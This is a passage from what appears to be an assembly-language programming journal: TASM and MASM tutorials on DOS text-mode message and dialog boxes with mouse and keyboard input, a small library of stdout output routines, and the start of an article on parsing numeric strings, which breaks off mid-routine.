Below is the source code of our simple program.
;; +------------------------------------------------------------------------+
;; | Program   : MSGBOX.ASM                                                 |
;; | Purpose   : Demonstration program about Message Box                    |
;; | Assembler : TASM                                                       |
;; +------------------------------------------------------------------------+
;; MACROS in this program    : @SetTextMode, @Cursor, @Display, @Window,
;;                             @Delay
;; PROCEDURES in this program: Message_box, Window
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY ;; @Always must be TINY model
;;///////////////////////////////////////////////////////////////////////;;
DATASEG ;; Initialize variables
RED EQU 4fh ;; @Color values
BLACK EQU 0fh
BLUE EQU 1fh
screen EQU BLUE
shadow_colour EQU BLACK
box_background_colour EQU RED
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
nl EQU 0Dh,0Ah
label dialog_box_text
db nl
db nl,'      +-------------------------+--------------------------------------+'
db nl,'      | ::/ \::::::.            | Program to Display a Message Box     |'
db nl,'      | :/___\:::::::.          |                                      |'
db nl,'      | /|    \::::::::.        | Written By S.SIRAJUDEEN.             |'
db nl,'      | :|   _/\:::::::::.      | E-Mail: ssirajudeen@...              |'
db nl,'      | :| _|\  \::::::::::.    |                                      |'
db nl,'      | :::\_____\::::::::::.   | Published in ASMJOURNAL              |'
db nl,'      | ::::::::::::::::::::::. | Internet: asmjournal.freeservers.com |'
db nl,'      |       AsmJournal        |                                      |'
db nl,'      +-------------------------+--------------------------------------+'
db nl,'      | # If you have any comments or suggestions then please email me |'
db nl,'      |   at ssirajudeen@...                                           |'
db nl,'      +----------------------------------------------------------------+'
db nl,nl,nl,nl
count dw $-offset dialog_box_text
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
upper_x equ 08 ;; Upper left corner of the box to be zoomed
upper_y equ 37
lower_x equ 08 ;; Lower right corner of the box to be zoomed
lower_y equ 39
left_x db upper_x ;; Variables to hold the UPPER LEFT coordinates of the
left_y db upper_y ;; next box to be displayed
right_x db lower_x ;; Variables to hold the LOWER RIGHT coordinates of the
right_y db lower_y ;; next box to be displayed
shadow_vertical_left_x db upper_x+1 ;; Don't Change!
shadow_vertical_left_y db lower_y+1 ;; Coordinates to display the VERTICAL
shadow_vertical_right_x db lower_x+1 ;; shadow of message box.
shadow_vertical_right_y db lower_y+2
shadow_horizontal_left_x db lower_x+1 ;; Don't Change!
shadow_horizontal_left_y db upper_y+2 ;; Coordinates to display the HORIZONTAL
shadow_horizontal_right_x db lower_x+1 ;; shadow of message box
shadow_horizontal_right_y db lower_y+2
;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
DW 100H DUP (?)
MyStack LABEL WORD
;;--------------------------< @SetTextMode >------------------------;;
@SetTextMode MACRO
mov ax,0003h
int 10h
ENDM ;;End of macro
;;----------------------------< @Cursor >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX : @Cursor <row>, <col>
@Cursor MACRO ROW,COL
mov ah,02
mov bh,00
mov dh,ROW
mov dl,COL
int 10h
ENDM ;;End of macro
;;----------------------------< @Display >---------------------------;;
;;PURPOSE: Macro to display a text
;;SYNTAX : @DISPLAY <text width>, <text address>
@Display MACRO xcount, address
LOCAL display_text
mov cx, xcount ;; Number of characters to be displayed
mov bx, offset address
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx ;; Point to next character
loop far ptr cs:display_text
ENDM ;;End of macro
;;-----------------------------< @Window >----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX : @window <background color>,
;; <Upper left row of user window>, <Upper left column>,
;; <Lower right row of user window>, <Lower right column>
@window MACRO color, lrow, lcol, rrow, rcol
mov ah,06
mov al,00
mov bh, color ;; Background Color
mov ch, lrow
mov cl, lcol
mov dh, rrow
mov dl, rcol
int 10h
ENDM ;;End of macro
;;-----------------------------< @Delay >-----------------------------;;
@delay MACRO
mov ah,86h ;; Execute a time delay
mov dx,4500h ;;9000
mov cx,0000h
int 15h
ENDM ;;End of macro
;;///////////////////////// MAIN PROGRAM /////////////////////////////;;
CODESEG ;; This marks the start of executable code
STARTUPCODE
mov sp,offset MyStack
push cs ;; Initialize segment registers.
pop ds
push cs
pop ss
mov ah,0Bh ;; Display screen border in WHITE color
mov bx,0007h
int 10h
call message_box ;; Display the message box
mov ax,4C00h ;; Terminate the program.
int 21h
;;//////////////////////////// Message_box ///////////////////////////;;
Message_box PROC
@SetTextMode
@cursor 00,00 ;; Position cursor at 00,00.
@window screen,00,00,24,79 ;; @Clear screen
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
mov cx,0008h ;; Don't change! Calculate how many times to zoom.
zoom:
push cx ;; @@Display a window which is zooming.
call window
pop cx
loop zoom
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
@display count, dialog_box_text
ret
Message_box ENDP
;;/////////////////////////// Window ///////////////////////////////;;
Window PROC
;;Display a window with box_background_colour (RED) as background.
@window box_background_colour, left_x, left_y, right_x, right_y
dec byte ptr left_x
sub cl,5
mov byte ptr left_y,cl
inc byte ptr right_x
add dl,5
mov byte ptr right_y,dl
;;---------------------------------------------------------------------;;
;;Display a vertical shadow.
@window shadow_colour,shadow_vertical_left_x,shadow_vertical_left_y,shadow_vertical_right_x,shadow_vertical_right_y
dec byte ptr shadow_vertical_left_x
add cl,5
mov byte ptr shadow_vertical_left_y,cl
inc byte ptr shadow_vertical_right_x
add dl,5
mov byte ptr shadow_vertical_right_y,dl
;;--------------------------------------------------------------------;;
;;Display a horizontal shadow.
@window shadow_colour,shadow_horizontal_left_x,shadow_horizontal_left_y,shadow_horizontal_right_x,shadow_horizontal_right_y
inc byte ptr shadow_horizontal_left_x
sub cl,5
mov byte ptr shadow_horizontal_left_y,cl
inc byte ptr shadow_horizontal_right_x
add dl,5
mov byte ptr shadow_horizontal_right_y,dl
;;--------------------------------------------------------------------;;
@delay
ret
Window ENDP
END
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;
EXAMPLE 2:
Well, next we're going to put a DIALOG BOX in our program.
What it does is:
- Displays a dialog box with YES and NO buttons
- Supports button selection using mouse
(i) Checks for mouse installation
(ii) Shows mouse pointer
(iii) Captures clicks of the left mouse button
- Checks for keyboard input
(i) Checks whether an EXTENDED key has been pressed
(ii) Checks whether the ENTER or TAB key has been pressed
- Toggles button selection on pressing the TAB, LEFT ARROW or RIGHT
ARROW key.
- On pressing the ENTER key or clicking the YES or NO button, displays a
different message according to the button selection and terminates.
What we will learn from this example is:
(i) Mouse handling
(ii) Screen handling using BIOS interrupt 10h
(iii) Keyboard handling using BIOS interrupt 16h
(iv) Idea of user interface design
I made the following program very straightforward and ignored code
optimization to reduce complexity.
;; +-------------------------------------------------------------------------+
;; | Program   : DLGBOX.ASM                                                  |
;; | Purpose   : Demonstration program about Dialog Box with YES & NO button |
;; | Features  : Supports mouse for button selection                         |
;; | Assembler : TASM                                                        |
;; | Required Knowledge: INT 21h, INT 10h, INT 16h, INT 33h & Scan Code      |
;; +-------------------------------------------------------------------------+
;; MACROS in this program    : @Cursor, @Display, @window, @Yes & @No
;; PROCEDURES in this program: Dialog_box
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY ;; @Always must be TINY model
;;///////////////////////////////////////////////////////////////////////;;
DATASEG ;; Initialize variables
mouse db 'n' ;; Flag to indicate the availability of mouse
mouse_x db 0 ;; Keep track of position of mouse cursor
mouse_y db 0
m_x dw 00
m_y dw 00
left_mouse_button db 0 ;; Flag updated on clicking the left mouse button
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
RED EQU 4fh ;; @Color values
CYAN EQU 3fh
BLACK EQU 0fh
BLUE EQU 1fh
WHITE EQU 7fh
box_height EQU 10
box_width EQU 46
left_x EQU 7 ;; Upper left corner of user window
left_y EQU 20
right_x EQU left_x+box_height-1 ;; Calculate lower right corner of user window
right_y EQU left_y+box_width-1
upper_left_row db left_x
upper_left_col db left_y
box_background_color EQU RED ; Background color of dialog box
nl EQU 0Dh,0Ah ; New line
label dialog_box_text
db '+--------------- USER COMMENT ---------------+' ;Dialog box. The variable
db '|                                            |' ;dialog_box_text contains
db '|          Written By S.Sirajudeen           |' ;10 lines; width of each
db '|          E-mail: ssirajudeen@...           |' ;line is 46 characters.
db '|                                            |'
db '|       HAVE YOU ENJOYED THIS PROGRAM?       |' ;NOTE:
db '|                                            |' ;If you edit here, you
db '|             Yes  #      No   #             |' ;should UPDATE the
db '|            #######     #######             |' ;text_width and
db '+--------------------------------------------+' ;text_line_count.
count dw $-offset dialog_box_text
text_line_count EQU 10 ;; Variable dialog_box_text contains 10 lines
text_width EQU 46 ;; and width of each line is 46 characters
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
shadow EQU WHITE ;; color of button shadow
;;NOTE: Width of 'yes' and 'yes_button' should be same.
yes_button db 17,' Yes ',16 ;; Displayed when the YES button is selected
yes db '  Yes  '
yes_horz_shadow db 7 dup(223)
yes_char_count EQU 7
;;NOTE: Width of 'no' and 'no_button' should be same.
no_button db 17,' No  ',16 ;; Displayed when the NO button is selected
no db '  No   '
no_horz_shadow db 7 dup(223)
no_char_count EQU 7
vert_shadow db 220
yes_x EQU right_x-2 ;; Coordinate where YES button to displayed
yes_y EQU left_y+(box_width/2)-yes_char_count-4 ;;32
no_x EQU right_x-2 ;; Coordinate where NO button to displayed
no_y EQU left_y+(box_width/2)+1 ;;44
select EQU BLUE ;; @Background color to highlight the button selection
unselect EQU BLACK
button db 'y' ;; @Flag to keep track of the button selection. If the value
;; is 'y', the YES button has selected; 'n' for the NO button.
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
label thank_you ;; Message to be displayed when the YES button is pressed
db 07,' Written By S.SIRAJUDEEN',nl
db '4/55,L.M.BUILDING,KUMARESAPURAM,KUTHAPAR(PO),TRICHY-620013,TAMILNADU,INDIA'
db nl,' Email: ssirajudeen@...'
db nl,nl,' Thank you! Good-bye!!'
thank_you_count dw $-thank_you
label suggest ;; Message to be displayed when the NO button is pressed
db 7h,' If you have any comments or suggestions, then please mail me at'
db nl,' ssirajudeen@...'
db nl
suggest_count dw $-suggest
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
;;  -------------+-----------   When a key is pressed, it returns a code.
;; |Extended Keys| Scan Code |  Alphanumeric keys, Tab, Space, Enter and
;; |-------------+-----------|  Escape return a one-byte ASCII code, but
;; | Left Arrow  |    75     |  EXTENDED KEYS return a two-byte code: the
;; | Right Arrow |    77     |  first byte is always 0 and the second is
;; | Up Arrow    |    72     |  the actual SCAN CODE. Arrow keys, Home, End,
;; | Down Arrow  |    80     |  PageUp, PageDown, Insert, Delete and the
;;  -------------+-----------   Function keys are EXTENDED KEYS.
LEFT_ARROW equ 75 ;; Scan code of LEFT ARROW key is 75
RIGHT_ARROW equ 77 ;; Scan code of RIGHT ARROW key is 77
TAB_KEY equ 9 ;; ASCII code of TAB key is 9
ENTER_KEY equ 13 ;; ASCII code of ENTER key is 13
;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
DW 50H DUP (?)
MyStack LABEL WORD
;;----------------------------< @Cursor >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX : @Cursor <row>, <col>
@Cursor MACRO ROW,COL
mov ah,02
mov bh,00
mov dh,ROW
mov dl,COL
int 10h
ENDM ;;End of macro
;;----------------------------< @Display >---------------------------;;
;;PURPOSE: Macro to display a text
;;SYNTAX : @DISPLAY <text width>, <text address>
@Display MACRO xcount, address
LOCAL display_text
mov cx, xcount ;; Number of characters to be displayed
mov bx, offset address
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx ;; Point to next character
loop far ptr cs:display_text
ENDM ;;End of macro
;;----------------------------< @window >-----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX : @window <background color>,
;; <Upper left row of user window>, <Upper left column>,
;; <Lower right row of user window>, <Lower right column>
@window MACRO color, lrow,lcol, rrow, rcol
mov ah,06
mov al,00
mov bh, color ;;Background Color
mov ch, lrow
mov cl, lcol
mov dh, rrow
mov dl, rcol
int 10h
ENDM ;;End of macro
;;------------------------< @button_shadow >--------------------------;;
;;PURPOSE : Macro to pad the button with horizontal and vertical chars to
;; make it a 3D button.
@button_shadow MACRO
@Cursor yes_x+1, yes_y+1 ;; Display horizontal shadow of YES button
@Display yes_char_count, yes_horz_shadow
@Cursor yes_x, yes_y+yes_char_count ;; Display vertical shadow
@Display 1, vert_shadow
@Cursor no_x+1, no_y+1 ;; Display horizontal shadow of NO button
@Display no_char_count, no_horz_shadow
@Cursor no_x, no_y+no_char_count ;; Display vertical shadow
@Display 1, vert_shadow
ENDM
;;-----------------------------< @Yes >-------------------------------;;
;;PURPOSE : Macro to select the YES button.
;; In other words, a window which is used as YES button is displayed
@Yes MACRO
mov button, 'y' ;; DON'T CHANGE! ; Update flag
@window select, yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
@window unselect, no_x, no_y, no_x, no_y+(no_char_count-1)
@Cursor yes_x,yes_y ;; Move cursor to YES button
@Display yes_char_count,yes_button ;; Display label of YES
@Cursor no_x,no_y ;; Move cursor to NO button
@Display no_char_count, no ;; Display label of NO button
ENDM ;;End of macro
;;-----------------------------< @No >--------------------------------;;
;;PURPOSE : Macro to select the NO button
;; In other words, a window which is used as NO button is displayed
@No MACRO
mov button, 'n' ;; DON'T CHANGE! ; Update flag
@window unselect,yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
@window select, no_x, no_y, no_x, no_y+(no_char_count-1)
@Cursor yes_x,yes_y
@Display yes_char_count, yes
@Cursor no_x,no_y
@Display no_char_count, no_button
ENDM ;;End of macro
;;//////////////////////// MAIN PROGRAM /////////////////////////////;;
CODESEG ;;This marks the start of executable code
STARTUPCODE
mov sp,offset MyStack
push cs ;;Initialize segment registers.
pop ds
push cs
pop ss
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
@window BLACK, 00, 00, 24, 79 ;;@Clear screen
call Dialog_box ;;Display the dialog box
display_thank_u:
cmp button,'y' ;; Check whether YES button has pressed/clicked
jne display_suggestion
@Display thank_you_count, thank_you
jmp _end
display_suggestion: ;; NO button has pressed/clicked
@Display suggest_count, suggest
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end:
mov ax,4C00h ;; Terminate the program.
int 21h
;;/////////////////////////// Dialog_box ////////////////////////////;;
Dialog_box PROC
mov ax,0003 ;; Don't change! Set text mode 3. Changing this mode
int 10h ;; gives a different resolution. Mouse movement is converted
;; into rows and columns based on the resolution of the text mode.
mov ax,00 ;; Reset mouse
int 33h
cmp ax,00 ;; Check for error
je start
mov ax,01 ;; Show mouse pointer
int 33h
mov mouse, 'y'
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
start:
@window box_background_color,left_x,left_y,right_x,right_y ;;Display a BOX
@Cursor left_x,left_y ;; Move cursor to upper left corner of dialog box
mov cx, text_line_count ;; Display n lines as dialog box text
mov bx, offset dialog_box_text ;; Address of text
next_line:
push bx ;; OUTER LOOP
push cx
mov cx,00 ;; INNER LOOP
mov cl, text_width
display_text:
mov ah,0Eh ;; Display the text
mov al,byte ptr [bx]
push bx
mov bh,00
mov bl,07h
int 10h
pop bx
inc bx
loop far ptr cs:display_text ;; INNER LOOP
pop cx
pop bx
mov dx,00 ;; Calculate address of next line
mov dl, text_width
add bx, dx
inc byte ptr upper_left_row
push bx
@Cursor upper_left_row, upper_left_col ;; Move cursor to next line within
pop bx ;; dialog box
loop far ptr cs:next_line ;; OUTER LOOP
@button_shadow
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_yes:
@Yes ;; Select the YES button
cmp left_mouse_button,01
je _end_proc
jmp mouse_check
_no:
@No ;;Select the NO button
cmp left_mouse_button,01
je _end_proc
mouse_check:
cmp mouse, 'y' ;; Check whether mouse is available
jne key_check
mov ax,03 ;; Get mouse cursor position
int 33h
mov left_mouse_button,bl
mov word ptr m_x,dx
mov word ptr m_y,cx
mouse_button:
and left_mouse_button, 01 ;; Check whether left mouse button is pressed
cmp left_mouse_button, 01
jne key_check
mouse_row:
mov mouse_x,0 ;; Mouse movement is converted into rows and columns
;; to calculate the position of mouse cursor
cmp word ptr m_x,00
je mouse_col
mov ax,word ptr m_x ;; In text mode 3, to calculate the current ROW,
mov bl,8 ;; divide the position value for VERTICAL movement
div bl ;; by 8.
mov mouse_x, al
mouse_col:
mov mouse_y,0 ;; Mouse movement is converted into rows and columns
;; to calculate the position of mouse cursor
cmp word ptr m_y,00
je key_check
mov ax, word ptr m_y ;; In text mode 3, to calculate the current COLUMN,
mov bl,8 ;; divide the position value for HORIZONTAL movement
div bl ;; by 8.
mov mouse_y, al
mouse_yes:
mov al, mouse_x
cmp al, yes_x ;; Check whether mouse has clicked anywhere on
jne mouse_no ;; the row where YES button is displayed
mov al, mouse_y
cmp al, yes_y
jb mouse_no
cmp al, yes_y+(yes_char_count-1)
ja mouse_no
mov button, 'y'
jmp _yes
mouse_no:
mov al, mouse_x
cmp al, no_x ;; Check whether mouse has clicked anywhere on
jne key_check ;; the row where NO button is displayed
mov al, mouse_y
cmp al, no_y
jb key_check
cmp al, no_y+(no_char_count-1)
ja key_check
mov button, 'n'
jmp _no
key_check:
mov ah,01 ;; @Check whether any character is in keyboard buffer
int 16h
jz mouse_check
mov ah,08 ;; @Receive character without echoing to screen
int 21h
cmp al, TAB_KEY ;; Check whether TAB key has pressed
je _left
cmp al,ENTER_KEY ;; Check whether ENTER key has pressed.
je _end_proc ;; Exit program
cmp al,00 ;; @Check whether any Extended Key has pressed.
jne mouse_check
mov ah,08
int 21h
cmp al, LEFT_ARROW ;; Check whether LEFT ARROW key has pressed
je _left
cmp al, RIGHT_ARROW ;; Check whether RIGHT ARROW key has pressed
je _right
jmp mouse_check
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;
_left:
cmp button,'y'
je _no
jmp _yes
_right:
cmp button,'y'
je _no
jmp _yes
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end_proc:
@Cursor right_x+1, 0 ;; Move cursor below the dialog box
mov ax,02 ;; Hide mouse cursor
int 33h
RET
Dialog_box ENDP ;; End of procedure
END ;; End of program
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;
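The mouse_row and mouse_col steps above divide the pixel position by 8
with DIV. Since 8 is a power of two, the same conversion can be done with
three right shifts. The following stand-alone sketch (not part of
DLGBOX.ASM) shows the idea. It assumes text mode 3, where the mouse driver
reports positions on a 640x200 virtual screen, and, like the program
above, it assumes that INT 33h is safe to call. The names click_row and
click_col are made up for this example.

```asm
        .MODEL TINY
        .CODE
        ORG 100h
start:  jmp main                ; skip over the data

click_row db 0                  ; text row of the click (0..24)
click_col db 0                  ; text column of the click (0..79)

main:   mov ax, 0003h           ; set text mode 3 (80x25)
        int 10h
        xor ax, ax              ; INT 33h, AX=0000h: reset mouse driver
        int 33h
        or ax, ax               ; AX=0000h means no mouse available
        jz done
        mov ax, 0001h           ; show mouse pointer
        int 33h
wait_click:
        mov ax, 0003h           ; get position and button status
        int 33h                 ; BX=buttons, CX=x (0..639), DX=y (0..199)
        test bl, 01h            ; bit 0 is set while the left button is down
        jz wait_click
        shr cx, 1               ; x / 8 = text column
        shr cx, 1
        shr cx, 1
        shr dx, 1               ; y / 8 = text row
        shr dx, 1
        shr dx, 1
        mov click_col, cl
        mov click_row, dl
        mov ax, 0002h           ; hide mouse pointer
        int 33h
done:   mov ax, 4C00h           ; terminate the program
        int 21h
        END start
```

Single-bit shifts are used so that the sketch also assembles for the
8086; with .386 enabled, as in the programs above, SHR CX,3 does the same
in one instruction.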
Now we have written a superb, user-friendly program. If you want to embed
the above examples in your work, you may have to change these programs
heavily, but the basic principles will be the same.
Please, e-mail me your comments and suggestions at
ssirajudeen@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
ASM Building Blocks
by Laura Fairhead
Here are some simple but very powerful library routines, primarily
concerned with screen output. They all follow the same conventions:
* Routines preserve all registers that they are not specified to return.
* The direction flag (DF) should always be clear before calling.
All code is presented in MASM format. I do not use very many of the
functions of this assembler so it should be trivial to assemble these under
a different one. I do, however, use OPTION SCOPED, which means that labels
within a PROC block are local to that PROC block (a label suffixed with a
double colon is given global scope though).
First come the primitive routines. These are responsible for the actual
output and simply call DOS to do it. This sort of thing is called a
'wrapper' function. It does nothing in itself except afford a
particular interface to an application. If all your access to the OS is in
a small number of logical wrapper functions then porting your code to other
systems becomes a lot easier.
;pstrcx- write CX characters to stdout
; uses DOS function 040h
;
;entry: DS:SI=string address
; CX=length of string
;
;exit: (no parameters are returned)
pstrcx PROC NEAR
;assume that DOS can't handle a zero-byte write
;(I don't trust those M$ programmers)
JCXZ don
PUSH AX
PUSH BX
MOV AH,040h
MOV BX,1 ;stdout is handle #1
XCHG DX,SI
INT 021h
XCHG DX,SI
POP BX
POP AX
don: RET
pstrcx ENDP
Note the use of XCHG. XCHG is an extremely useful instruction indeed,
even though there are those who wish to see its death along with all
those other "horrible, odd-ball, x86 specific" instructions. XCHG in
essence performs two operations simultaneously, which is hideously useful
considering they are both MOV's. Also, if one of the registers is AX (or
EAX in 32-bit code) you get a lovely 1 byte instruction bonus.
XCHG is in fact the real instruction hiding behind the pseudo-op NOP.
If you look at the opcode for a NOP, it is 090h. This is actually the
encoding for XCHG AX,AX, which, since it has no effect on the machine state
whatsoever (except of course IP+=1), is ideally suited for this.
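To see the encodings for yourself, a tiny throw-away program like the
sketch below can be assembled with a listing file and inspected. It is
only an illustration, not one of the library routines. The byte values in
the comments are the standard 16-bit encodings, and the register choices
are arbitrary.

```asm
        .MODEL TINY
        .CODE
        ORG 100h
start:  XCHG AX,AX      ;090h, the very same byte as NOP
        XCHG AX,DX      ;092h, one byte because AX is involved
        XCHG DX,SI      ;087h plus a ModRM byte, two bytes
        MOV DX,SI       ;a plain MOV also takes two bytes
        RET             ;a .COM program can exit with a near RET
        END start
```

So XCHG DX,SI costs no more than the MOV DX,SI it replaces in pstrcx, and
it preserves the old DX in SI for free.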
I haven't looked back since adding putch to my library. I used to use
the sequence:-
MOV DL,<char>; MOV AH,2; INT 021h
Not only is the putch method much cleaner and more flexible, it also
saves bytes! Of course the pay-back is that this method adds clocks.
However if you think about it the wasted clocks are meaningless really.
Sending characters one at a time to stdout is rather like spelling out
a dictate to your secretary letter-by-letter. In a case where you want
more MIPS you should be looking at your higher level algorithm and not
the output routine, an INT takes a vast amount of time anyway...
;putch- write single character to stdout
; uses DOS function 02h
;
;entry: AL=character to write
;
;exit: (no parameters are returned)
putch PROC NEAR
PUSH DX
XCHG DX,AX
MOV AH,2
INT 021h
XCHG DX,AX
POP DX
RET
putch ENDP
Not hot on speed this strlen, it was written to be compact. You can
if you wish write MUCH faster code than this. I believe X-Bios2 presented
something along these lines in a previous APJ. However, the most important
thing here is certainly not speed, and again if you wanted speed on string
handling so badly, you should really not use asciiz at all; it was never
designed for that.
;strlen- return length of asciiz string
;
;entry: DS:SI=address of asciiz string
;
;exit: CX=length of string
strlen PROC NEAR
PUSH AX
XOR CX,CX
DEC CX
lop: INC CX
LODSB
CMP AL,1
JNC lop
SBB SI,CX
POP AX
RET
strlen ENDP
Now, already, we start getting serious payback for being so good.
The code virtually writes itself.....
;pstr- write asciiz string to stdout
;
;entry: DS:SI=address of asciiz string
;
;exit: (no parameters are returned)
pstr PROC NEAR
PUSH CX
CALL NEAR PTR strlen
CALL NEAR PTR pstrcx
POP CX
RET
pstr ENDP
;pstrcr- write asciiz string to stdout with appended newline
;
;entry: DS:SI=address of asciiz string
;
;exit: (no parameters are returned)
pstrcr PROC NEAR
CALL NEAR PTR pstr
JMP NEAR PTR outcr
pstrcr ENDP
;outcr- write newline to stdout
;
;entry: (no entry parameters)
;
;exit: (no parameters are returned)
outcr PROC NEAR
PUSH AX
MOV AL,0Dh
CALL NEAR PTR putch
MOV AL,0Ah
CALL NEAR PTR putch
POP AX
RET
outcr ENDP
;pchn- write repeated character to stdout
;
;entry: AL=character
; CX=repetitions (0 is valid and does nothing)
;
;exit: (no parameters are returned)
pchn PROC NEAR
JCXZ don
PUSH CX
lop: CALL NEAR PTR putch
LOOP lop
POP CX
don: RET
pchn ENDP
;pstrlcl- output string DS:SI left justified in a field
; of CL spaces
;
; if the field width is smaller than the string length
; then the string is simply output
;
;entry: DS:SI=asciiz string
; CL=field width
;
;exit: (all registers preserved)
pstrlcl PROC NEAR
PUSH AX
PUSH CX
CALL NEAR PTR pstr
MOV CH,0
XCHG CX,AX
CALL NEAR PTR strlen
SUB AX,CX
JNA SHORT don
XCHG CX,AX
MOV AL,020h
CALL NEAR PTR pchn
don: POP CX
POP AX
RET
pstrlcl ENDP
Note the use of JNA. If you look at the logic for the JNA branch
(not many people seem to do this) you find that it branches iff
CF=1 OR ZF=1, hence it is taken after the SUB if the result is <=0,
that is, when the string already fills the field.
You may notice that all the routine names are <= 8 chars. The reason
for this is that you can save each one as a separate file, giving it
the name of the routine. This allows easy reference but has a drawback
or two:
(i) you have to remember the dependencies when you INCLUDE them
(ii) you end up with a LOT of files
So far I haven't found either of these 'drawbacks' to be a serious
problem.
I will be referring back to these routines a lot in future articles;
whenever routines are required I will state it, and the code will have a
list of INCLUDE's for the routines to be included. In this manner it will
be possible to present quite non-trivial programs within a reasonable
amount of space.
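As a rough sketch of what such a program might look like, here is a small
.COM program built from the routines above. The file names are an
assumption (one file per routine, named after it, with an .asm
extension); substitute whatever names you saved the routines under. The
dependencies noted in the comments follow from the CALLs in each routine.

```asm
        .MODEL TINY
        OPTION SCOPED
        .CODE
        ORG 100h
start:  CLD                             ;the routines expect DF clear
        MOV SI,OFFSET greet
        CALL NEAR PTR pstrcr            ;print the string plus a newline
        MOV AL,'='
        MOV CX,10
        CALL NEAR PTR pchn              ;print ten '=' characters
        CALL NEAR PTR outcr
        MOV AX,04C00h                   ;terminate the program
        INT 021h

greet   DB 'Hello from the building blocks',0

        ;hypothetical file names, one routine per file
        INCLUDE pstrcx.asm
        INCLUDE putch.asm
        INCLUDE strlen.asm
        INCLUDE pstr.asm                ;needs strlen, pstrcx
        INCLUDE outcr.asm               ;needs putch
        INCLUDE pstrcr.asm              ;needs pstr, outcr
        INCLUDE pchn.asm                ;needs putch
        END start
```

Listing the primitives first and the routines that depend on them
afterwards is not required by the assembler, but it makes a forgotten
dependency easy to spot.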
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Converting Strings to Numbers
by Chris Dragan
Many programs require user input, which often consists of numbers. For
this purpose there are library functions, for example sscanf() in C. But
in assembly everything has to be done by hand, even under Windows (with
the exception of edit controls and the GetDlgItemInt() function).
My last project required a flexible function for reading numbers stored
as strings. From this project I extracted a function which handles most
of the common number formats.
The function expects the esi register to point at a string containing
the number. The string can have one of the following forms:
10       decimal integer
10D      decimal integer
1010B    binary integer
AH       hexadecimal integer (does not require leading zero)
0XA      hexadecimal integer
$A       hexadecimal integer
12Q      octal integer
12O      octal integer
10F      float
10.0     float
10.0F    float
1.0E+1F  float
1.E+1    float
The string is required to have all letters (hex digits, number type
specifiers) uppercase. If a number is to contain lowercase letters, it has
to be converted before calling the function.
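A minimal sketch of such a conversion is shown below. It is a hypothetical
helper, not part of the original function, written in TASM ideal mode on
the assumption that it is assembled in the same 32-bit setup as
ConvertNumber. The name UpcaseNumber and its labels are made up for this
example.

```asm
; Hypothetical helper: convert the zero-terminated string at esi
; to uppercase in place. Preserves all registers.
proc UpcaseNumber
                push    eax
                push    esi
__up_next:      mov     al, [esi]
                test    al, al          ; zero ends the string
                jz      __up_done
                cmp     al, 'a'
                jb      __up_skip       ; below 'a': leave unchanged
                cmp     al, 'z'
                ja      __up_skip       ; above 'z': leave unchanged
                sub     al, 'a'-'A'     ; 'a'..'z' becomes 'A'..'Z'
                mov     [esi], al
__up_skip:      inc     esi
                jmp     __up_next
__up_done:      pop     esi
                pop     eax
                ret
endp UpcaseNumber
```

Calling UpcaseNumber and then ConvertNumber with the same esi lets a
string such as 0xff or 1.5e+3 be handled as 0XFF or 1.5E+3.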
The function returns in eax number type:
- 0 if the number is invalid,
- 1 if the number is a dword integer,
- 2 if the number is a qword integer and
- 3 if the number is a float.
The number is returned in edx (dword), ecx:edx (qword) or st(0) (float).
The number will be a qword integer if it exceeds 0xFFFFFFFF.
Also notice that the number is assumed to be positive: a '-' before the
number is not accepted and has to be handled externally.
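One possible way of handling the sign externally is sketched below. This
wrapper is hypothetical and not part of the original function. It assumes
TASM ideal mode and the ConvertNumber interface described above, and the
name ConvertSigned and its labels are made up. Note that a negated dword
is only meaningful as a signed value if the magnitude does not exceed
80000000h; the sketch does not check this.

```asm
; Hypothetical wrapper: like ConvertNumber, but accepts an optional
; leading '-'. Returns the same values, with the number negated when
; the string started with '-'.
proc ConvertSigned
                cmp     [byte esi], '-'
                je      __cs_minus
                call    ConvertNumber   ; no sign: nothing else to do
                ret
__cs_minus:     inc     esi             ; skip the '-'
                call    ConvertNumber
                dec     esi             ; restore the caller's pointer
                cmp     eax, 2
                jb      __cs_small      ; eax = 0 or 1
                ja      __cs_float      ; eax = 3
                neg     ecx             ; eax = 2: negate qword ecx:edx
                neg     edx
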